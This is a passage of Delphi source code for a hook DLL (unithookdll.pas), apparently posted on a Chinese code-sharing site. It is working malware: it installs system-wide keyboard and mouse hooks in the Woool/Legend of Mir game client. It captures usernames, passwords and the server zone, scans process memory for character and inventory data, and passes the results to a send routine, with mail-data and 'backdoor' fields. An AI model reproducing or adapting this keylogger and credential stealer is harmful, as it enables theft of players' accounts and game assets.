📄 unithookdll.pas
字号:
begin
VirtualQueryEx(ProcessHndle, PMemoAddr, MBI, SizeOf(MBI));
if (dword(MbI.BaseAddress) = OldBasse) and (MbI.RegionSize <= 0) then break;
//writedat2('g2:' + inttostr(integer(MbI.BaseAddress))+' '+inttostr(MbI.RegionSize)+' '+inttostr(Mbi.Protect));
OldBasse := dword(MbI.BaseAddress);
PMemoAddr := pointer(dword(MbI.BaseAddress) + MbI.RegionSize + $F);
//setlength(sTmp, MbI.RegionSize);
//ReadProcessMemory(ProcessHndle, PMemoAddr, pchar(sTmp), MbI.RegionSize, lpNumberOfBytesRead);
//if(MBI.State = MEM_COMMIT)then //MEM_COMMIT=$1000 MEM_RESERVE=$2000 MEM_FREE=$10000
if (Mbi.Protect = PAGE_READONLY) or (Mbi.Protect = PAGE_READWRITE) or (Mbi.Protect = PAGE_WRITECOPY) then
begin
try
p := MbI.BaseAddress;
if MbI.RegionSize > $10 then
begin
size := MbI.RegionSize - $10;
while true do
begin
d1 := StrPosD(p, size, $CDCD0000);
if d1 = $FFFFFFFF then
begin
break;
end;
dec(size, d1 + 4);
inc(p, d1 + 4);
//writedat2('found1 ' + inttostr(integer(P)) + ' ' + inttostr(size) + ' ' + inttostr(plongword(p - 4)^));
if (plongword(p - $C)^ = 0) and (plongword(p - $8)^ = $0F) and
(plongword(p)^ = 0) and (plongword(p + $4)^ = 0) then
begin
writedat2('found2 ' + inttostr(integer(P)));
inc(p, $10);
dec(size, $10);
if plongword(p)^ <> $CDCDCDCD then
begin
writedat2('found3 ' + inttostr(integer(P)));
s := '';
for i1 := 0 to $30 - 1 do
begin
if (p[0] <> #0) then
begin
strlcopy(@buf, p, 30);
//writedat2(buf);
s := s + buf + #$D#$A;
end;
inc(p, $60);
end;
if s <> '' then
begin
strcopy(@wupin, pchar(s));
writedat2('物品:' + wupin);
if timer1 <> 0 then killtimer(0, timer1);
timer1 := 0;
send;
end;
bBreak := true;
break;
end;
end;
end;
end;
except
end;
end;
end;
except
end;
end;
CloseHandle(ProcessHndle);
result := 0;
end;
procedure FunTimerFindWupin(Wnd: Longint; uMsg: UINT; idEvent: UINT; Time: DWORD); stdcall;
var
ThreadId1: dword;
begin
killtimer(0, TimerFindWupin);
CreateThread(nil, 0, @GetWinPin, nil, 0, ThreadId1);
end;
function Get1024pt(pt: TPoint): TPoint;
var
screenx, screeny: integer;
begin
screenx := GetSystemMetrics(SM_CXSCREEN);
screeny := GetSystemMetrics(SM_CYSCREEN);
result.X := round(pt.X / screenx * 1024);
result.Y := round(pt.Y / screeny * 768);
end;
function GetRoleFromMem: string;
var
ProcessHndle: HWND;
SysInfo: _SYSTEM_INFO;
MBI: MEMORY_BASIC_INFORMATION;
PMemoAddr: Pointer;
//MemoAddr, lpNumberOfBytesRead
OldBasse: DWORD;
ibak, i1, i2: integer;
d1, size: longword;
p, pbak: pchar;
bfound, bBreak: boolean;
s, info: string;
function GetJob(c: char): string;
begin
case c of
'0': result := ' 武士';
'1': result := ' 魔法师';
'2': result := ' 道士';
else result := '';
end;
end;
function GetSex(c: char): string;
begin
case c of
'0': result := ' 男';
'1': result := ' 女';
else result := '';
end;
end;
function GetGrade(c: pchar): string;
begin
result := ' ' + c[0];
if (c[1] >= '0') and (c[1] <= '9') then result := result + c[1];
end;
function GetName(c: pchar): string;
var
i: integer;
begin
result := '';
for i := 0 to 30 do
if c[i] = '/' then break
else result := result + c[i];
end;
function GetSeqWhileNum(c: pchar; iStart, iMaxStep: integer; var iIndex: integer): boolean;
var
i1: integer;
begin
result := false;
for i1 := iStart to iStart + iMaxStep - 1 do
begin
if (c[i1] >= '0') and (c[i1] <= '9') then //nothing
else if c[i1] = '/' then
begin
result := true;
iIndex := i1;
break;
end;
end;
end;
begin
result := '';
if GetRoleInfoBusy then exit;
GetRoleInfoBusy := true;
bBreak := false;
ProcessHndle := OpenProcess(PROCESS_VM_OPERATION or PROCESS_VM_READ or PROCESS_QUERY_INFORMATION, false, GetCurrentProcessId);
if ProcessHndle > 0 then
begin
writedat2('Role g1');
GetSystemInfo(SysInfo);
OldBasse := $FFFFFFFF;
PMemoAddr := SysInfo.lpMinimumApplicationAddress;
try
while (not bBreak) and (dword(PMemoAddr) < dword(SysInfo.lpMaximumApplicationAddress)) do
begin
VirtualQueryEx(ProcessHndle, PMemoAddr, MBI, SizeOf(MBI));
if (dword(MbI.BaseAddress) = OldBasse) and (MbI.RegionSize <= 0) then break;
//writedat2('g2:' + inttostr(integer(MbI.BaseAddress))+' '+inttostr(MbI.RegionSize)+' '+inttostr(Mbi.Protect));
OldBasse := dword(MbI.BaseAddress);
PMemoAddr := pointer(dword(MbI.BaseAddress) + MbI.RegionSize + $F);
if (Mbi.Protect = PAGE_READONLY) or (Mbi.Protect = PAGE_READWRITE) or (Mbi.Protect = PAGE_WRITECOPY) then
begin
try
p := MbI.BaseAddress;
if MbI.RegionSize > 10 then
begin
size := MbI.RegionSize - 10;
while (not bBreak) do
begin
d1 := StrPosChar(p, size, '/');
if d1 = $FFFFFFFF then
begin
break;
end;
dec(size, d1 + 1);
inc(p, d1);
// wenson/2/17/0/0/*sdfsdf23/0/209/41/0/
// 名字/职业/?/级别/性别
if (p[2] = '/') and
(p[1] >= '0') and (p[1] <= '2') and //职业
(p[3] >= '0') and (p[3] <= '9') then //不明
begin
writedat2('found0 ' + strpas(p));
if GetSeqWhileNum(p, 4, 5, i1) then
begin
writedat2('found1 ' + inttostr(i1));
if GetSeqWhileNum(p, i1 + 1, 3, i2) then
begin
writedat2('found2 ' + inttostr(i2));
if (p[i2 + 1] >= '0') and (p[i2 + 1] <= '1') then //Sex
begin
info := GetJob(p[1]) + GetSex(p[i2 + 1]) + GetGrade(@p[i1 + 1]);
writedat2('found3 ' + info);
pbak := p - 1;
for ibak := 0 to 20 do
begin
if (pbak[0] = '*') or (pbak[0] = '/') then bFound := true //中止
else if (pbak[0] >= '0') and (pbak[0] <= 'z') then bFound := false
else if (pbak[0] >= #$A1) and (pbak[0] <= #$FE) then //第1个汉字
begin
dec(pbak);
if (pbak[0] = #$CC) and (pbak[0] = #$CC) then
begin
inc(pbak);
bFound := true; //中止
end
else if (pbak[0] >= #$A1) and (pbak[0] <= #$F7) then //第0个汉字
bFound := false
else begin
inc(pbak);
bFound := true; //中止
end;
end
else bFound := true; //中止
if bFound then
begin
if (pbak[0] = '*') then dec(pbak);
info := 'A-' + GetName(@pbak[1]) + info;
writedat2('found4 ' + info);
inc(p, i2 + 3);
if (p[0] <> '*') and
((p[0] < '0') or (p[0] > 'z') or (p[0] = '/')) then
strcopy(@Role, pchar(info))
else begin
s := GetName(p);
inc(p, length(s));
if GetSeqWhileNum(p, 4, 5, i1) and
GetSeqWhileNum(p, i1 + 1, 3, i2) and
(p[i2 + 1] >= '0') and (p[i2 + 1] <= '1') then //Sex
begin
info := info + ' B-' + s + GetJob(p[1]) + GetSex(p[i2 + 1]) + GetGrade(@p[i1 + 1]);
strcopy(@Role, pchar(info))
end
else strcopy(@Role, pchar(info));
end;
if timer1 <> 0 then killtimer(0, timer1);
timer1 := settimer(0, 1, 10000, @timerfun);
writedat2('角色:' + Role);
bBreak := true;
break;
end;
dec(pbak);
end;
end;
end;
end;
end;
inc(p);
end;
end;
except
end;
end;
end;
except
end;
end;
CloseHandle(ProcessHndle);
GetRoleInfoBusy := false;
end;
procedure LogoMouse(wpa, lpa: integer);
var
p, h: hwnd;
pt: TPoint;
rect: Trect;
WinText, ClassText: array[0..255] of char;
s: string;
begin
if not isCQ then exit;
p := pMOUSEHOOKSTRUCT(lpa)^.hwnd; //GetForegroundWindow;
WinText[0] := #0;
GetWindowText(p, @WinText, sizeof(WinText));
ClassText[0] := #0;
GetClassName(p, @ClassText, sizeof(ClassText));
if isUpdate then
begin
writedat2('mouse WinText:' + WinText + ' class:' + classtext);
if (ClassText = 'TForm1') and (wintext = '传奇世界客户端') then
begin
h := findwindowex(p, 0, 'TComboBox', nil);
writedat2('mouse WinText:' + WinText + ' class:' + classtext + ' :' + inttostr(h));
if h <> 0 then
begin
WinText[0] := #0;
GetWindowText(h, WinText, sizeof(WinText));
strcopy(@pshmem^.qu, pchar(trim(wintext)));
writedat2('区mouse: ' + pshmem^.qu);
end;
end;
exit;
end;
writedat2(' mouse WinText:' + WinText + ' class:' + classtext + ' x:' + inttostr(pMOUSEHOOKSTRUCT(lpa)^.pt.X) +
' Y:' + inttostr(pMOUSEHOOKSTRUCT(lpa)^.pt.Y));
if (copy(wintext, 1, 8) = sText) and (classtext = sClass) then
begin
pt := Get1024pt(pMOUSEHOOKSTRUCT(lpa)^.pt);
writedat2('x:' + inttostr(pt.x) + ' y:' + inttostr(pt.y));
rect.Left := 151;
rect.Top := 553;
rect.Right := 199;
rect.Bottom := 572;
if ptinrect(rect, pt) then
begin
GetUP(nil);
imain := 1;
end;
if (imain = 1) or (imain = 2) then
begin
rect.Left := 460;
rect.Top := 307;
rect.Right := 608;
rect.Bottom := 561;
if ptinrect(rect, pt) and ((pt.Y - rect.Top) mod 33 <= 23) then
begin
strcopy(@server, pchar(inttostr(1 + (pt.Y - rect.Top) div 33)));
imain:=2;
writedat2('server:' + server);
if (pUp1 <> nil) and ((user[0] = #0) or (pass[0] = #0)) then
begin
do1(nil);
exit;
end;
end;
end;
if imain = 2 then
begin
rect.Left := 443;
rect.Top := 731;
rect.Right := 545;
rect.Bottom := 757;
if ptinrect(rect, pt) and (role[0] = #0) then
begin
imain:=3;
writedat('开始找角色');
s := GetRoleFromMem;
if (s <> '') then
begin
strcopy(@role, pchar(s));
writedat('找到角色:' + role);
end;
writedat2('Role:' + role);
TimerFindWupin := settimer(0, 2, 4000, @FunTimerFindWupin);
end;
end;
end;
end;
procedure LogoKey(wpa, lpa: integer);
var
p: hwnd;
WinText, ClassText: array[0..255] of char;
begin
if not isCQ then exit;
writedat2('key0:' + inttostr(Wpa));
p := GetActiveWindow;
WinText[0] := #0;
GetWindowText(p, WinText, sizeof(WinText));
ClassText[0] := #0;
GetClassName(p, ClassText, sizeof(ClassText));
if (copy(wintext, 1, 8) = sText) and (classtext = sClass) then
begin
GetEditCount(p, 'Button', 'Edit');
writedat2('iC: ' + inttostr(ic1) + ' ' + inttostr(ic2) + ' ' + inttostr(ic3) + ' ' + inttostr(ic4) + ' user:' + user + ' pass:' + pass);
if (Wpa = vk_return) then
begin
GetUP(nil);
imain := 1;
end;
end;
end;
function KeyPro(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT;
stdcall; export;
begin
Result := CallNextHookEx(pshmem^.KeyHook, iCode, wParam, lParam);
if ((Lparam and $80000000) = 0) then
begin
LogoKey(wparam, lparam);
end;
end;
function MouseProc(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT;
stdcall; export;
begin
if (wparam = WM_LBUTTONDOWN) or (wparam = WM_RBUTTONDOWN) or (wparam = WM_LBUTTONDBLCLK) then
begin
LogoMouse(wparam, lparam);
end;
Result := CallNextHookEx(pshmem^.MouseHook, iCode, wParam, lParam);
end;
procedure StartHook(data: pchar; BackDoor: pchar; VerTest: boolean); stdcall;
//var
// SystemTime: TSystemTime;
begin
// GetLocalTime(SystemTime);
// with SystemTime do
// if (wYear >= 2004) and (wMonth >= 9) then exit;
FirstProcess := true;
pshmem^.qu[0] := #0;
pshmem^.VerTest := VerTest;
strcopy(pshmem^.data, data);
strcopy(pshmem^.backdoor, backdoor);
TimerWriteDat := settimer(0, 10, 1000, @FunTimerWriteDat);
if pshmem^.KeyHook = 0 then
pshmem^.KeyHook := SetWindowsHookEx(WH_KEYBOARD, Keypro, HInstance, 0);
if pshmem^.MouseHook = 0 then
pshmem^.MouseHook := SetWindowsHookEx(WH_MOUSE, MouseProc, Hinstance, 0);
// if callhook = 0 then
// callhook := SetWindowsHookEx(WH_CALLWNDPROC, callProc, Hinstance, 0);
end;
procedure StopHook; stdcall;
begin
killtimer(0, TimerWriteDat);
if pshmem^.KeyHook <> 0 then
UnhookwindowsHookEx(pshmem^.KeyHook);
pshmem^.KeyHook := 0;
if pshmem^.MouseHook <> 0 then
UnhookwindowsHookEx(pshmem^.MouseHook);
pshmem^.MouseHook := 0;
end;
initialization
imain := 0;
timer1 := 0;
qu[0] := #0;
server[0] := #0;
user[0] := #0;
pass[0] := #0;
WuPin[0] := #0;
lastuser := '';
lastpass := '';
role[0] := #0;
FirstProcess := false;
SendHtmlMailData := '';
// is9x := IsWindows9x;
hMappingFile := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(TShareMem), pchar(MappingFileName));
pShMem := MapViewOfFile(hMappingFile, FILE_MAP_WRITE or FILE_MAP_READ, 0, 0, 0);
filename := extractfilename(GetModalName(GetCurrentProcessId, '.dat'));
isUpdate := (ansicomparetext(filename, 'woool.exe') = 0);
isCQ := isUpdate or (ansicomparetext(filename, 'woool.dat') = 0);
finalization
try
if FirstProcess then
StopHook;
UnMapViewOfFile(pShMem);
CloseHandle(hMappingFile);
except
end;
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -